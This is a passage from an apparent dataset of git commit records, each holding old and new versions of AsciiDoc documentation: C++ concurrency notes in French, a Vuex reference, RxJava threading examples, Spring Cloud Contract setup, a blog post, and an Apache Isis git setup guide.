conditions\n\n[source,c++]\n----\nstd::condition_variable cv;\nstd::mutex cv_m; \/\/ This mutex is used for three purposes:\n \/\/ 1) to synchronize accesses to i\n \/\/ 2) to synchronize accesses to std::cerr\n \/\/ 3) for the condition variable cv\nint i = 0;\n \nvoid waits()\n{\n std::unique_lock<std::mutex> lk(cv_m);\n std::cerr << \"Waiting... \\n\";\n cv.wait(lk, []{return i == 1;});\n std::cerr << \"...finished waiting. i == 1\\n\";\n}\n \nvoid signals()\n{\n {\n std::lock_guard<std::mutex> lk(cv_m);\n i = 1;\n std::cerr << \"Notifying again...\\n\";\n }\n cv.notify_all();\n}\n----\n\n*Tous* les threads qui ex\u00e9cutent waits vont \u00eatre d\u00e9bloqu\u00e9s par le notify_all\nLe mutex est utilis\u00e9 par le thread signalant lorsqu'il touche \u00e0 la condition\nIl est aussi utilis\u00e9 par le thread en attente. \n\nIMPORTANT: Il est unlock\u00e9 au d\u00e9but de l'appel de la fonction wait \n\n== future, promise\n\n* version compl\u00e8te\nOn peut faire un get sur un futur\nOn fait un set sur une promise\n\nOn peut r\u00e9cup\u00e9rer le futur associ\u00e9e d'une promise\n\n----\nvoid accumulate(boost::promise<int> &p)\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n p.set_value(sum);\n}\n\nint main()\n{\n boost::promise<int> p;\n boost::future<int> f = p.get_future();\n boost::thread t{accumulate, std::ref(p)};\n std::cout << f.get() << '\\n';\n}\n----\n\n\n* version simplifi\u00e9e (avec async)\n----\nint accumulate()\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n return sum;\n}\n\nint main()\n{\n boost::future<int> f = boost::async(accumulate);\n std::cout << f.get() << '\\n';\n}\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e17c75e050bde8841e3e6824755e8a264a05befe","subject":"Update 2017-06-18-Vuex-Quick-Ref.adoc","message":"Update 2017-06-18-Vuex-Quick-Ref.adoc","repos":"mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io,mnishihan\/mnishihan.github.io","old_file":"_posts\/2017-06-18-Vuex-Quick-Ref.adoc","new_file":"_posts\/2017-06-18-Vuex-Quick-Ref.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n= Vuex Quick Ref\n:published_at: 2017-06-18\n:hp-tags: JavaScricpt, vuejs, vuex\n\n## Store\n\n- Instanciated with ```Vuex.Store(options)``` constructor\n- Injected into child components as ```this.$store``` to enable easy access\n- Properties of ```options``` object are described below.\n \n### state\n\n- ```state``` is the reactive data stored into a vuex ```store``` and very similar to the ```data``` property in options for component constructor.\n- ```state``` variables are usually exposed as ```computed``` properties to enable easy access within components.\n- ```mapState```\n - A utility function to mix & expose ```state``` variables as ```computed``` properties in components.\n - Imported as ```import { mapState } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapState({})```\n\n### getters\n\n- ```getters``` is for vuex ```store``` what ```computed``` is for components.\n- ```getters``` are also exposed through ```computed``` properties to enable easy access within components.\n- Signature of **getter** is ```getterName: function(state, getters) { \/** ... *\/ }```\n- Arguments can also be passed to getters by returning a function. This is particularly useful when querying an array in the store is required.\n- ```mapGetters```\n - A utility function to mix & expose ```getters``` in ```computed``` within components.\n - Imported as ```import { mapGetters } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapGetters({})```\n\n### mutations\n\n- ```mutations``` is an object to define **mutator** methods in vuex ```store``` which are allowed & responsible to modify store's ```state```.\n- It is not permissible to modify ```state``` directly in vuex stores, so **mutators** are needed.\n- Signature of **mutator** is ```mutatorName: function(state, [payload]) { \/** ... *\/ }```\n- To invoke a **mutator**, you need to call ```store.commit(mutation, [payload])``` with its ```name``` and it's optional ```payload```.\n- ```mutations``` must be synchronous.\n- ```mapMutations```\n - A utility function to mix & expose ```mutations``` as component ```methods``` that invokes respective mutation via ```store.commit```.\n - Imported as ```import { mapMutations } from 'vuex'```\n - Returns object, so it can be used to merge with local ```methods``` option of components using [object spread](#) syntax, i.e. ```...mapMutations({})```\n \n### actions\n\n- Actions are similar to mutations, the differences being that:\n - Instead of mutating the state, actions commit mutations.\n - Actions can contain arbitrary asynchronous operations.\n- Action handlers receive a ```context``` object which exposes the same set of methods\/properties on the ```store``` instance, so you can call ```context.commit``` to commit a mutation, or access the ```state``` and ```getters``` via ```context.state``` and ```context.getters``` respectively.\n- Actions are triggered with the ```store.dispatch(actionName, payload)``` method.\n\n","old_contents":"# Vuex Quick Ref\n\n## Store\n\n- Instanciated with ```Vuex.Store(options)``` constructor\n- Injected into child components as ```this.$store``` to enable easy access\n- Properties of ```options``` object are described below.\n \n### state\n\n- ```state``` is the reactive data stored into a vuex ```store``` and very similar to the ```data``` property in options for component constructor.\n- ```state``` variables are usually exposed as ```computed``` properties to enable easy access within components.\n- ```mapState```\n - A utility function to mix & expose ```state``` variables as ```computed``` properties in components.\n - Imported as ```import { mapState } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapState({})```\n\n### getters\n\n- ```getters``` is for vuex ```store``` what ```computed``` is for components.\n- ```getters``` are also exposed through ```computed``` properties to enable easy access within components.\n- Signature of **getter** is ```getterName: function(state, getters) { \/** ... *\/ }```\n- Arguments can also be passed to getters by returning a function. This is particularly useful when querying an array in the store is required.\n- ```mapGetters```\n - A utility function to mix & expose ```getters``` in ```computed``` within components.\n - Imported as ```import { mapGetters } from 'vuex'```\n - Returns object, so it can be used to merge with local ```computed``` properties of components using [object spread](#) syntax, i.e. ```...mapGetters({})```\n\n### mutations\n\n- ```mutations``` is an object to define **mutator** methods in vuex ```store``` which are allowed & responsible to modify store's ```state```.\n- It is not permissible to modify ```state``` directly in vuex stores, so **mutators** are needed.\n- Signature of **mutator** is ```mutatorName: function(state, [payload]) { \/** ... *\/ }```\n- To invoke a **mutator**, you need to call ```store.commit(mutation, [payload])``` with its ```name``` and it's optional ```payload```.\n- ```mutations``` must be synchronous.\n- ```mapMutations```\n - A utility function to mix & expose ```mutations``` as component ```methods``` that invokes respective mutation via ```store.commit```.\n - Imported as ```import { mapMutations } from 'vuex'```\n - Returns object, so it can be used to merge with local ```methods``` option of components using [object spread](#) syntax, i.e. ```...mapMutations({})```\n \n### actions\n\n- Actions are similar to mutations, the differences being that:\n - Instead of mutating the state, actions commit mutations.\n - Actions can contain arbitrary asynchronous operations.\n- Action handlers receive a ```context``` object which exposes the same set of methods\/properties on the ```store``` instance, so you can call ```context.commit``` to commit a mutation, or access the ```state``` and ```getters``` via ```context.state``` and ```context.getters``` respectively.\n- Actions are triggered with the ```store.dispatch(actionName, payload)``` method.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4a4f0816b4eb6f06ee5c8dea3d38fc3b547e66e6","subject":"improved docs","message":"improved docs\n","repos":"Petikoch\/rxjava_examples","old_file":"docs\/02_threading_and_parallelism.adoc","new_file":"docs\/02_threading_and_parallelism.adoc","new_contents":"== Threading and Parallelism with RxJava and Java 8\n\nProbably you also had a difficult start concerning RxJava and threading like http:\/\/www.grahamlea.com\/2014\/07\/rxjava-threading-examples[Graham Lea did].\n\nI had.\n\nWhy did I? I made some false assumptions regarding threading instead of properly learning \"stuff\" first using e.g. http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\nThe main point about Rx and parallelsim \/ concurrency is probably noted here http:\/\/www.introtorx.com\/Content\/v1.0.10621.0 and states\n\na) _\"Rx is single-threaded by default\"_\n\nand\n\nb) _\"While Rx has concurrency features, these should not be mistaken for a concurrency framework. Rx is designed for querying data, and as discussed in the first chapter, parallel computations or composition of asynchronous methods is more appropriate for other frameworks.\"_\n\nI would sum this up to:\n\nRx is created mainly for \"clients\" (client applications like apps, desktop gui applications, ...) where\nyou have typically one thread from the GUI and you would like to \"spin off\" several background tasks (in parallel) when an event like submitting a form happens,\ncombine these asynchronously returning background task-results to one result which you display in the GUI. It's not primarly made for \"servers\",\ne.g. to handle concurrent HTTP requests in a webserver. But you can use it to do implement \"servers\", if you know \"how\".\n\nSee also https:\/\/github.com\/ReactiveX\/RxJava\/issues\/1673 and the section about schedulers in http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\n=== OneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive.java[]\n\nThink of a McDrive with one lane and very few customers arriving. The one lane is either free or there is one customer.\nEach customer orders always the same three \"things\", which you can prepare with 3 workers in the background \"in parallel\".\n\n* Parallelism in a logical sense\n* Based on the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator (Note: @Beta annotated in RxJava 1.0.14)\n\nIn this example there is no need for backpressure, since the customers arrive \"slow \" and the McDrive can handle them in time.\n\nBut what happens if you increase the number of arriving customers (=decrease seconds in interval operator)?\nCurrently, the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator implementation in RxJava seems to \"buffer\" on backpressure.\n\n=== OneLaneMcDrive2\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive2.java[]\n\nAn Implementation of OneLaneMcDrive without the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\nInstead we use a PublishSubject instance to \"communicate the result to the outside\" and use an AtomicBoolean instance to limit\nthe number of concurrent customers to one.\n\nYou immediately understand now the \"power\" of the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\n\n=== TwoLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/TwoLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with two lanes. There are still few customers arriving concurrently. Each of the lane\nis either free or there is maximum one customer in the lane. We have at each time between 0 and 2 customers concurrently.\n\n* Parallelism in a execution sense: We can handle two customers at the same time\n* Parallelism in a logical sense: like OneLaneMcDrive\n\nThere is also no need for backpressure, since the customers arrive \"slow \" and the McDrive can handle them in time.\n\n=== JammedOneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/JammedOneLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with more customers arriving. The McDrive can't handle all of them \"just in time\",\nso a wait line (queue) builds up. The longer the example runs, the longer the wait line becomes.\n\nWe need some kind of backpressure: we choose buffering (queueing) and get a \"jam\".\n\n=== InfiniteLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/InfiniteLaneMcDrive.java[]\n\nNow, we have an \"infinite\" number of lanes. The number of lanes grows to the point when we have\nenough lanes to handle all the arriving customers \"just in time\".\n\nWe output the numer of lanes (=number of concurrently handled customers).\n\n=== SingleThreadedByDefault\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/SingleThreadedByDefault.java[]\n\nLet's come back from the food to the technical details. As initially said, RxJava is _\"single threaded by default\"_.\nAlthough you can offload the work from one thread to an other (using Schedulers), the program flow then is switching\nfrom one thread to another *one* thread and not to a pool of threads. Your sourcecode (e.g. your observer) is always called by\nonly *one* and the *same* thread.\n\nSo, to make it more clear: _\"your sourcecode is always called by the same single thread\"_.\n\nBenefit? You don't have to implement thread-safe code, which is hard.","old_contents":"== Threading and Parallelism with RxJava and Java 8\n\nProbably you also had a difficult start concerning RxJava and threading like http:\/\/www.grahamlea.com\/2014\/07\/rxjava-threading-examples[Graham Lea did].\n\nI had.\n\nWhy did I? I made some false assumptions regarding threading instead of properly learning \"stuff\" first using e.g. http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\nThe main point about Rx and parallelsim \/ concurrency is probably noted here http:\/\/www.introtorx.com\/Content\/v1.0.10621.0 and states\na) _\"Rx is single-threaded by default\"_\nand b) _\"While Rx has concurrency features, these should not be mistaken for a concurrency framework. Rx is designed for querying data, and as discussed in the first chapter, parallel computations or composition of asynchronous methods is more appropriate for other frameworks.\"_\n\nI would sum this up to:\n\nRx is created mainly for \"clients\" (client applications like apps, desktop gui applications, ...) where\nyou have typically one thread from the GUI and you would like to \"spin off\" several background tasks (in parallel) when an event like submitting a form happens,\ncombine these asynchronously returning background tasks results to one result which you display in the GUI. It's not primarly made for \"servers\",\ne.g. to handle concurrent HTTP requests in a webserver. But you can use it to do implement \"servers\", if you know \"how\".\n\nSee also https:\/\/github.com\/ReactiveX\/RxJava\/issues\/1673 and the section about schedulers in http:\/\/www.pluralsight.com\/courses\/reactive-programming-java-8-rxjava.\n\n=== OneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive.java[]\n\nThink of a McDrive with one lane and very few customers arriving. The one lane is either free or there is one customer.\nEach customer orders always the same three \"things\", which you can prepare with 3 workers in the background \"in parallel\".\n\n* Parallelism in a logical sense\n* Based on the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator (Note: @Beta annotated in RxJava 1.0.14)\n\nIn this example there is no need for backpressure, since the customers arrive \"slow \" and the McDrive can handle them in time.\n\nBut what happens if you increase the number of arriving customers (=decrease seconds in interval operator)?\nCurrently, the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator implementation in RxJava seems to \"buffer\" on backpressure.\n\n=== OneLaneMcDrive2\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/OneLaneMcDrive2.java[]\n\nAn Implementation of OneLaneMcDrive without the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\nInstead we use a PublishSubject instance to \"communicate the result to the outside\" and use an AtomicBoolean instance to limit\nthe number of concurrent customers to one.\n\nYou immediately understand now the \"power\" of the http:\/\/reactivex.io\/documentation\/operators\/flatmap.html[flatmap] operator.\n\n=== TwoLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/TwoLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with two lanes. There are still few customers arriving concurrently. Each of the lane\nis either free or there is maximum one customer in the lane. We have at each time between 0 and 2 customers concurrently.\n\n* Parallelism in a execution sense: We can handle two customers at the same time\n* Parallelism in a logical sense: like OneLaneMcDrive\n\nThere is also no need for backpressure, since the customers arrive \"slow \" and the McDrive can handle them in time.\n\n=== JammedOneLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/JammedOneLaneMcDrive.java[]\n\nSame as OneLaneMcDrive, but now with more customers arriving. The McDrive can't handle all of them \"just in time\",\nso a wait line (queue) builds up. The longer the example runs, the longer the wait line becomes.\n\nWe need some kind of backpressure: we choose buffering (queueing) and get a \"jam\".\n\n=== InfiniteLaneMcDrive\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/InfiniteLaneMcDrive.java[]\n\nNow, we have an \"infinite\" number of lanes. The number of lanes grows to the point when we have\nenough lanes to handle all the arriving customers \"just in time\".\n\nWe output the numer of lanes (=number of concurrently handled customers).\n\n=== SingleThreadedByDefault\n\nlink:..\/src\/main\/java\/ch\/petikoch\/examples\/rxjava\/threading\/SingleThreadedByDefault.java[]\n\nLet's come back from the food to the technical details. As initially said, RxJava is _\"single threaded by default\"_.\nAlthough you can offload the work from one thread to an other (using Schedulers), the program flow then is switching\nfrom one thread to another *one* thread and not to a pool of threads. Your sourcecode (e.g. your observer) is always called by\nonly *one* and the *same* thread.\n\nSo, to make it more clear: _\"your sourcecode is always called by the same single thread\"_.\n\nBenefit? You don't have to implement thread-safe code, which is hard.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ba46219cc6ebbac186433cc4242e8c75d3b4a49","subject":"Update title style. (#1364)","message":"Update title style. (#1364)\n\nFixes #1349","repos":"spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/main\/asciidoc\/sagan-boot.adoc","new_file":"docs\/src\/main\/asciidoc\/sagan-boot.adoc","new_contents":"== On the Producer Side\n\nTo start working with Spring Cloud Contract, you can add files with REST or messaging contracts expressed in either Groovy DSL or YAML to the contracts directory, which is set by the contractsDslDir property. By default, it is $rootDir\/src\/test\/resources\/contracts.\n\nThen you can add the Spring Cloud Contract Verifier dependency and plugin to your build file, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-verifier<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins portion of the file:\n\n```xml\n<plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n<\/plugin>\n```\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application compliance with the added contracts. By default, the tests get generated under `org.springframework.cloud.contract.verifier.tests`.\n\nAs the implementation of the functionalities described by the contracts is not yet present, the tests fail.\n\nTo make them pass, you must add the correct implementation of either handling HTTP requests or messages. Also, you must add a base test class for auto-generated tests to the project. This class is extended by all the auto-generated tests, and it should contain all the setup information necessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nThe following example, from pom.xml, shows how to specify the base test class:\n\n```xml\n<build>\n <plugins>\n <plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n <configuration>\n <baseClassForTests>com.example.contractTest.BaseTestClass<\/baseClassForTests> \n <\/configuration>\n <\/plugin>\n <plugin>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n```\n\nINFO: The baseClassForTests element lets you specify your base test class. It must be a child of a configuration element within spring-cloud-contract-maven-plugin.\n\nOnce the implementation and the test base class are in place, the tests pass, and both the application and the stub artifacts are built and installed in the local Maven repository. You can now merge the changes, and you can publish both the application and the stub artifacts in an online repository.\n\n== On the Consumer Side\n\nYou can use Spring Cloud Contract Stub Runner in the integration tests to get a running WireMock instance or messaging route that simulates the actual service.\n\nTo do so, add the dependency to Spring Cloud Contract Stub Runner, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-stub-runner<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two ways:\n\nBy checking out the Producer side repository and adding contracts and generating the stubs by running the following commands:\n\n```bash\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n```\n\nThe tests are being skipped because the producer-side contract implementation is not in place yet, so the automatically-generated contract tests fail.\n\nBy getting already-existing producer service stubs from a remote repository. To do so, pass the stub artifact IDs and artifact repository URL as Spring Cloud Contract Stub Runner properties, as the following example shows:\n\n```yml\n stubrunner:\n ids: 'com.example:http-server-dsl:+:stubs:8080'\n repositoryRoot: https:\/\/repo.spring.io\/libs-snapshot\n``` \n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide the group-id and artifact-id values for Spring Cloud Contract Stub Runner to run the collaborators' stubs for you, as the following example shows:\n\n```java\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n stubsMode = StubRunnerProperties.StubsMode.LOCAL)\npublic class LoanApplicationServiceTests {\n```\n\nUse the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\nNow, in your integration test, you can receive stubbed versions of HTTP responses or messages that are expected to be emitted by the collaborator service.\n","old_contents":"== On the Producer Side\n\nTo start working with Spring Cloud Contract, you can add files with REST or messaging contracts expressed in either Groovy DSL or YAML to the contracts directory, which is set by the contractsDslDir property. By default, it is $rootDir\/src\/test\/resources\/contracts.\n\nThen you can add the Spring Cloud Contract Verifier dependency and plugin to your build file, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-verifier<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins portion of the file:\n\n```xml\n<plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n<\/plugin>\n```\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application compliance with the added contracts. By default, the tests get generated under `org.springframework.cloud.contract.verifier.tests`.\n\nAs the implementation of the functionalities described by the contracts is not yet present, the tests fail.\n\nTo make them pass, you must add the correct implementation of either handling HTTP requests or messages. Also, you must add a base test class for auto-generated tests to the project. This class is extended by all the auto-generated tests, and it should contain all the setup information necessary to run them (for example `RestAssuredMockMvc` controller setup or messaging test setup).\n\nThe following example, from pom.xml, shows how to specify the base test class:\n\n```xml\n<build>\n <plugins>\n <plugin>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n <version>${spring-cloud-contract.version}<\/version>\n <extensions>true<\/extensions>\n <configuration>\n <baseClassForTests>com.example.contractTest.BaseTestClass<\/baseClassForTests> \n <\/configuration>\n <\/plugin>\n <plugin>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n```\n\nINFO: The baseClassForTests element lets you specify your base test class. It must be a child of a configuration element within spring-cloud-contract-maven-plugin.\n\nOnce the implementation and the test base class are in place, the tests pass, and both the application and the stub artifacts are built and installed in the local Maven repository. You can now merge the changes, and you can publish both the application and the stub artifacts in an online repository.\n2.2. On the Consumer Side\n\nYou can use Spring Cloud Contract Stub Runner in the integration tests to get a running WireMock instance or messaging route that simulates the actual service.\n\nTo do so, add the dependency to Spring Cloud Contract Stub Runner, as the following example shows:\n\n```xml\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-contract-stub-runner<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n```\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two ways:\n\nBy checking out the Producer side repository and adding contracts and generating the stubs by running the following commands:\n\n```bash\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n```\n\nThe tests are being skipped because the producer-side contract implementation is not in place yet, so the automatically-generated contract tests fail.\n\nBy getting already-existing producer service stubs from a remote repository. To do so, pass the stub artifact IDs and artifact repository URL as Spring Cloud Contract Stub Runner properties, as the following example shows:\n\n```yml\n stubrunner:\n ids: 'com.example:http-server-dsl:+:stubs:8080'\n repositoryRoot: https:\/\/repo.spring.io\/libs-snapshot\n``` \n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide the group-id and artifact-id values for Spring Cloud Contract Stub Runner to run the collaborators' stubs for you, as the following example shows:\n\n```java\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n stubsMode = StubRunnerProperties.StubsMode.LOCAL)\npublic class LoanApplicationServiceTests {\n```\n\nUse the `REMOTE` stubsMode when downloading stubs from an online repository and `LOCAL` for offline work.\n\nNow, in your integration test, you can receive stubbed versions of HTTP responses or messages that are expected to be emitted by the collaborator service.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bab0b13dbb2e2b22bd8939e77b0aa0c70d58dc0","subject":"Update 2015-08-23-Define-Extrapolate.adoc","message":"Update 2015-08-23-Define-Extrapolate.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_contents":"= Define Extrapolate\n\nExtrapolate is a blog.\n\nNot a travel blog, or a food blog, or a book\/movie review blog, though these are all things that I enjoy and will likely find themselves cameos in posts here and there. Extrapolate isn't a daily\/weekly\/{insert regular time interval}-ly journal blog either, though it might seem like it at times. \n\nExtrapolate is an ongoing record of the more interesting \"ideas\" that find their ways into my mind. I hesitate to use the word \"ideas\" here because (at least in my personal connotation-dictionary) __ideas__ are discrete, and useful in some compacity. The things I think about are hardly discrete and rarely useful, instead occupying the hazy intellectual territory at the intersection of personal experience and pattern recognition. \n\nThat last bit probably makes zero sense to you, so let me try to explain. As I go about my exceptionally average life, I (like my 7+ billion fellow humans) inevitably accumulate a set of experiences, memories, ideas. __These__ are discrete; I can mentally point to a conversation I've had, or an article I've read, or a place I've been to. In isolation, these \"points\" are hardly worth thinking about, much less writing about. If I led a more interesting life, I could've made this blog a place to simply `Ctrl+C` `Ctrl+V` these experiences\/ideas from my sensory receptors, with a dash of introspection. The analytical analog of an Instagram filter, if you will.\n\nBut for better or worse, my life __is__ pretty mundane, so instead I ","old_contents":"= Define Extrapolate\n\nExtrapolate is a blog.\n\nNot a travel blog, or a food blog, or a book\/movie review blog, though these are all things that I enjoy and will likely find themselves cameos in posts here and there. Extrapolate isn't a daily\/weekly\/{insert regular time interval}-ly journal blog either, though it might seem like it at times. \n\nExtrapolate is an ongoing record of the more interesting \"ideas\" that find their ways into my mind. I hesitate to use the word \"ideas\" here because (at least in my personal connotation-dictionary) __ideas__ are discrete, and useful in some compacity. The processes that I spend most of my mental CPU on are neither of these. ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ff634eb3f54eeb61cd1f42d5caf794873d6ec74b","subject":"ISIS-2290: use AsciiDoc substitutions and aligned monospaced elements","message":"ISIS-2290: use AsciiDoc substitutions and aligned monospaced elements\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/conguide\/modules\/ROOT\/pages\/building-apache-isis.adoc","new_file":"antora\/components\/conguide\/modules\/ROOT\/pages\/building-apache-isis.adoc","new_contents":"[[building-apache-isis]]\n= Building Apache Isis\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\n:page-partial:\n\n\n\n\n\n== Git\n\nThe Apache Isis source code lives in a git repo.\n\n\n=== Installation\n\nThe easiest place to get hold of command-line git is probably the http:\/\/git-scm.com\/downloads[github download page].\n\nOn Windows, this also installs the rather good mSysGit Unix shell. We recommend that you enable git for both the mSysgit and the Windows command prompt:\n\nimage::building-apache-isis\/setting-up-git.png[width=\"350px\",link=\"{imagesdir}\/building-apache-isis\/setting-up-git.png\"]\n\nOnce git is installed, the two main command line tools to note are:\n\n* `git` command line tool\n* `gitk` for viewing the commit history\n\nIf using Windows, note that github also have a dedicated https:\/\/help.github.com\/articles\/set-up-git[Windows client]. With a little http:\/\/haacked.com\/archive\/2012\/05\/30\/using-github-for-windows-with-non-github-repositories.aspx[hacking around], it can also be made to work with non-github repositories.\n\nIf using Mac, you might also want to check out Atlassian's http:\/\/www.atlassian.com\/software\/sourcetree\/overview[Sourcetree].\n\n\n\n==== Cloning the Apache Isis repo\n\nFirst, clone the Apache Isis repo:\n\n[source,bash]\n----\ngit clone https:\/\/github.com\/apache\/isis.git\n----\n\n\n==== Configuring Git\n\nNext up is to configure your user name and password:\n\n[source,bash,subs=+quotes]\n----\ngit config user.name \"__My Name Here__\"\ngit config user.email _myusername@apache.org_\n----\n\nNext, configure the `core.autocrlf` so that line endings are normalized to LF (Unix style) in the rep; again see https:\/\/git-wip-us.apache.org\/[Apache's git] page:\n\n\n* on Windows, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf true\n----\n\n* on Mac\/Linux, use: +\n+\n[source,bash]\n----\ngit config core.autocrlf input\n----\n\n\nThe Windows setting means that files are converted back to CRLF on checkout; the Mac\/Linux setting means that the file is left as LF on checkout.\n\nWe also recommend setting `core.safecrlf`, which aims to ensure that any line ending conversion is repeatable. Do this on all platforms:\n\n[source,bash]\n----\ngit config core.safecrlf true\n----\n\n\nNote that these settings are supplemented in the repo by the `.gitattributes` file and that explicitly specifies line handling treatment for most of the common file types that we have.\n\nNext, we recommend you setup this a refspec so that you can distinguish remote tags from local ones. To do that, locate the `[remote "origin"]` section in your `.git\/config` and add the third entry shown below:\n\n\n[source,bash]\n----\n[remote \"origin\"]\n url = ... whatever ...\n fetch = ... whatever ...\n fetch = +refs\/tags\/*:refs\/tags\/origin\/*\n----\n\n\nThis will ensure that a `git fetch` or `git pull` places any remote tags under `origin\/xxx`. For example, the `isis-1.0.0` tag on the origin will appear under `origin\/isis-1.0.0`.\n\n\nIf you don't use git outside of Apache, you can add the `--global` flag so that the above settings apply for all repos managed by git on your PC.\n\n\n\n=== Getting help\n\nThree commands of git that in particular 